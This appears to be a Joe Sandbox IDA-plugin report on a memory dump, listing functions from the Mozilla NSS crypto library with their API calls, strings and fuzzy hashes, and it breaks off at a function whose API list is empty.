Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ErrorValuememcpy
String ID: 0
API String ID: 3044119603-4108050209
Opcode ID: cffa93d53e7fe3c5cc01b576bff24ffb7c403fc4f3dbfc921294f87931743442
Instruction ID: 47d435938a54a4e5730ab766d519f173a6193f51591e2f6cf916c061cf31765f
Opcode Fuzzy Hash: cffa93d53e7fe3c5cc01b576bff24ffb7c403fc4f3dbfc921294f87931743442
Instruction Fuzzy Hash: 24F16CB2B0021A9FDB218F24CC81BDA77B5BF49318F0541A9E908A7641E775EE94CFD1

Function 6D05A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6D05A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6D05A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D05A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6D05A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D05A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D05A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D05A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D05A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6D05A69A

Strings

database corruption, xrefs: 6D05A627
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D05A61D, 6D05A68B, 6D05A6B3
%s at line %d of [%.10s], xrefs: 6D05A62C

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: e21f854438690dfb6883ca389d05880c0bcd72563c467f4172e3dec4fa47aba5
Instruction ID: 4149af11d10f480150d2cd27f2f6c3269626944e2d7d00d2d84ecd2ef8fce990
Opcode Fuzzy Hash: e21f854438690dfb6883ca389d05880c0bcd72563c467f4172e3dec4fa47aba5
Instruction Fuzzy Hash: AC517571908301EBEB019F14D990F6E7BE1BB44318F50886DF9898B251E771ED94DBA3

Function 6CF845B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6CF81984,?), ref: 6CF845F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CF845FB

Part of subcall function 6CFE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE08B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6CF8461E

Part of subcall function 6CFDFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6CF84101,00000000,?,?,?,6CF81666,?,?), ref: 6CFDFCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6CF84646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CF84662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CF8467A
PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0), ref: 6CF84691
PL_FreeArenaPool.NSS3 ref: 6CF846A3
PL_FinishArenaPool.NSS3 ref: 6CF846AB
free.MOZGLUE(?), ref: 6CF846BC
PORT_ZAlloc_Util.NSS3(?), ref: 6CF846E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF84717

Strings

security, xrefs: 6CF845EC

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: 1fe1465fc00d2e076a1a1ec6c9e642ae81fa0c7f6eaa62a3e61afeb4d3bf26cd
Instruction ID: e87616d76d27233a3bfca2b9e1be82cab7e71b2199c0569fde3ea082fa614a55
Opcode Fuzzy Hash: 1fe1465fc00d2e076a1a1ec6c9e642ae81fa0c7f6eaa62a3e61afeb4d3bf26cd
Instruction Fuzzy Hash: 5F4125B29063106BE7108B259C50B5BBBBCAF4826CF094629FC19A7B45E731E914CBD6

Function 6CFFAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFFADB1

Part of subcall function 6CFDBE30: SECOID_FindOID_Util.NSS3(6CF9311B,00000000,?,6CF9311B,?), ref: 6CFDBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CFFADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CFFAE08

Part of subcall function 6CFDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0B18D0,?), ref: 6CFDB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFFAE25
PL_FreeArenaPool.NSS3 ref: 6CFFAE63
PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0), ref: 6CFFAE4D

Part of subcall function 6CF04C70: TlsGetValue.KERNEL32(?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04C97
Part of subcall function 6CF04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04CB0
Part of subcall function 6CF04C70: PR_Unlock.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFFAE93
PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0), ref: 6CFFAECC
PL_FreeArenaPool.NSS3 ref: 6CFFAEDE
PL_FinishArenaPool.NSS3 ref: 6CFFAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFFAEF5
PL_FinishArenaPool.NSS3 ref: 6CFFAF16

Strings

security, xrefs: 6CFFADEE

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: caffe497262755977b3b8f12498fcd60efabeb2a432ff311515b52532b202e4f
Instruction ID: b22e3585b2caa3b96043cdb744132150ba37cd79cd96a5e09a6bc68965f1577b
Opcode Fuzzy Hash: caffe497262755977b3b8f12498fcd60efabeb2a432ff311515b52532b202e4f
Instruction Fuzzy Hash: A84116B280420477FB215B269C85BEB32E8EF4670CF140525E96497BA1FB75A90AC7D3

Function 6CFB25C0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6CFB25DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6CFB262A

Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D090BAB
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090BBA
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6CFB260F

Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(?), ref: 6D090B88
Part of subcall function 6D0909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D090C5D
Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D090C8D
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090C9C
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(?), ref: 6D090CD1
Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D090CEC
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090CFB
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D090D16
Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D090D26
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090D35
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D090D65
Part of subcall function 6D0909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D090D70
Part of subcall function 6D0909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D090D90
Part of subcall function 6D0909D0: free.MOZGLUE(00000000), ref: 6D090D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6CFB25F6

Part of subcall function 6D0909D0: PR_Now.NSS3 ref: 6D090A22
Part of subcall function 6D0909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D090A35
Part of subcall function 6D0909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D090A66
Part of subcall function 6D0909D0: PR_GetCurrentThread.NSS3 ref: 6D090A70
Part of subcall function 6D0909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D090A9D
Part of subcall function 6D0909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D090AC8
Part of subcall function 6D0909D0: PR_vsmprintf.NSS3(?,?), ref: 6D090AE8
Part of subcall function 6D0909D0: EnterCriticalSection.KERNEL32(?), ref: 6D090B19
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D090B48
Part of subcall function 6D0909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D090C76
Part of subcall function 6D0909D0: PR_LogFlush.NSS3 ref: 6D090C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6CFB2699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6CFB26C5

Strings

tokenPresent = 0x%x, xrefs: 6CFB25F1
pulCount = 0x%p, xrefs: 6CFB2625
pSlotList = 0x%p, xrefs: 6CFB260A
C_GetSlotList, xrefs: 6CFB25D8
slotID[%d] = %x, xrefs: 6CFB26C0
*pulCount = 0x%x, xrefs: 6CFB2694
nm, xrefs: 6CFB2646, 6CFB2675

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList$nm
API String ID: 2625801553-2748654845
Opcode ID: 54aee784eaaf053f3e16ba482911abedfcb86661eecfb7143813ee434ed35871
Instruction ID: e324d3f84845b9b519c71a9960e455d744c4a5398f026f696ea167c5432b3ddf
Opcode Fuzzy Hash: 54aee784eaaf053f3e16ba482911abedfcb86661eecfb7143813ee434ed35871
Instruction Fuzzy Hash: E831D231205106AFEB18DF66DC88B5A37B6EB96319F084068F904A7253DF32DD44CB61

Function 6CF98DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CF98E22
EnterCriticalSection.KERNEL32(?), ref: 6CF98E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CF98E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CF98E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CF98E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF98EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CF98EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CF98EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CF98F00
free.MOZGLUE(?), ref: 6CF98F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CF98F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CF98F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CF98F5B
PR_Unlock.NSS3(?), ref: 6CF98F72
PR_Unlock.NSS3(?), ref: 6CF98F82

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 054571ee51c58b89aef66de4539fa378ccaa7511718702af9d6902ff41158484
Instruction ID: 2c1c70ca3f76597f508a523dc373e9ae767fabead58d39bc372c83ee59bd17e6
Opcode Fuzzy Hash: 054571ee51c58b89aef66de4539fa378ccaa7511718702af9d6902ff41158484
Instruction Fuzzy Hash: 8651BFB2D01215AFFB109F68CC84AAABBB9FF45758F15452AED089B700E731ED4187E1

Function 6CFCEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CFCEE0B

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFCEEE1

Part of subcall function 6CFC1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CFC1D7E
Part of subcall function 6CFC1D50: EnterCriticalSection.KERNEL32(?), ref: 6CFC1D8E
Part of subcall function 6CFC1D50: PR_Unlock.NSS3(?), ref: 6CFC1DD3

TlsGetValue.KERNEL32 ref: 6CFCEE51
EnterCriticalSection.KERNEL32(?), ref: 6CFCEE65
PR_Unlock.NSS3(?), ref: 6CFCEEA2
free.MOZGLUE(?), ref: 6CFCEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CFCEED0
PR_Unlock.NSS3(?), ref: 6CFCEF48
free.MOZGLUE(?), ref: 6CFCEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CFCEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CFCEFA4
free.MOZGLUE(?), ref: 6CFCEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CFCF055
free.MOZGLUE(?), ref: 6CFCF060

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 82d27247d74a62c2cf161e7f5672ecdc314eaf0b88bdc333650faaf2e8561278
Instruction ID: aaeff055123ac3fe33277196c5061c015530ea53f716304c8a865cd81787b598
Opcode Fuzzy Hash: 82d27247d74a62c2cf161e7f5672ecdc314eaf0b88bdc333650faaf2e8561278
Instruction Fuzzy Hash: 87815175B0020AABEF00DFA5DC45BDF7BB5BF08358F554024E909A7611E731E964CBA2

Function 6CF94CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CF94D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CF94D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CF94DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF94E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CF94E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CF94E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CF94E85
DER_Encode_Util.NSS3(?,?,6D0E05A4,00000000), ref: 6CF94EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CF94F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CF94F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF94F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CF94F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CF94F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF94FC8

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 8c405e6a3a83f902b0cc7ff489cfd26bfff19171c482e8483f535967cb7a3631
Instruction ID: 314d9f2ee72f81394d76a1f70e127e3ab6357099c1f48fae715b576f1454d9d1
Opcode Fuzzy Hash: 8c405e6a3a83f902b0cc7ff489cfd26bfff19171c482e8483f535967cb7a3631
Instruction Fuzzy Hash: C581A372908302AFFB41CF24D840B5BBBE4AB9835CF15852DF969DB641E731E904CB92

Function 6CF90470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CF904B7

Part of subcall function 6CFE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF887ED,00000800,6CF7EF74,00000000), ref: 6CFE1000
Part of subcall function 6CFE0FF0: PR_NewLock.NSS3(?,00000800,6CF7EF74,00000000), ref: 6CFE1016
Part of subcall function 6CFE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF887ED,00000008,?,00000800,6CF7EF74,00000000), ref: 6CFE102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF90539

Part of subcall function 6CFE1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE1228
Part of subcall function 6CFE1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CFE1238
Part of subcall function 6CFE1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE124B
Part of subcall function 6CFE1200: PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0,00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE125D
Part of subcall function 6CFE1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CFE126F
Part of subcall function 6CFE1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CFE1280
Part of subcall function 6CFE1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CFE128E
Part of subcall function 6CFE1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CFE129A
Part of subcall function 6CFE1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CFE12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF9054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CF9056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF905CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6CF905EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6CF905FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6CF90621
PR_EnterMonitor.NSS3 ref: 6CF9063E
PR_ExitMonitor.NSS3 ref: 6CF90668
CERT_DestroyCertificate.NSS3(?), ref: 6CF90697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF906AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF906CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF906DA

Part of subcall function 6CF8E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6CF904DC,?,?), ref: 6CF8E6C9
Part of subcall function 6CF8E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6CF904DC,?,?), ref: 6CF8E6D9
Part of subcall function 6CF8E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6CF904DC,?,?), ref: 6CF8E6F4
Part of subcall function 6CF8E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6CF904DC,?), ref: 6CF8E703
Part of subcall function 6CF8E6B0: CERT_FindCertIssuer.NSS3(?,?,6CF904DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF8E71E

Part of subcall function 6CF8F660: PR_EnterMonitor.NSS3(6CF9050F,?,00000001,?,?,?), ref: 6CF8F6A8
Part of subcall function 6CF8F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6CF8F6C1
Part of subcall function 6CF8F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6CF8F7C8

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: f7b29360d5cd9ca1894e2c9887ea8bf6a1f3646474ae809bf59cb46bfbac6524
Instruction ID: bf675b739a5925b425ffd79147d9e1f62fea1e99f1ea05bba59ae667bb7ec884
Opcode Fuzzy Hash: f7b29360d5cd9ca1894e2c9887ea8bf6a1f3646474ae809bf59cb46bfbac6524
Instruction Fuzzy Hash: EA61BEB2A08341ABFF00CF28DC40B5B77F5AF88358F144529F95997691EB70E918CB92

Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

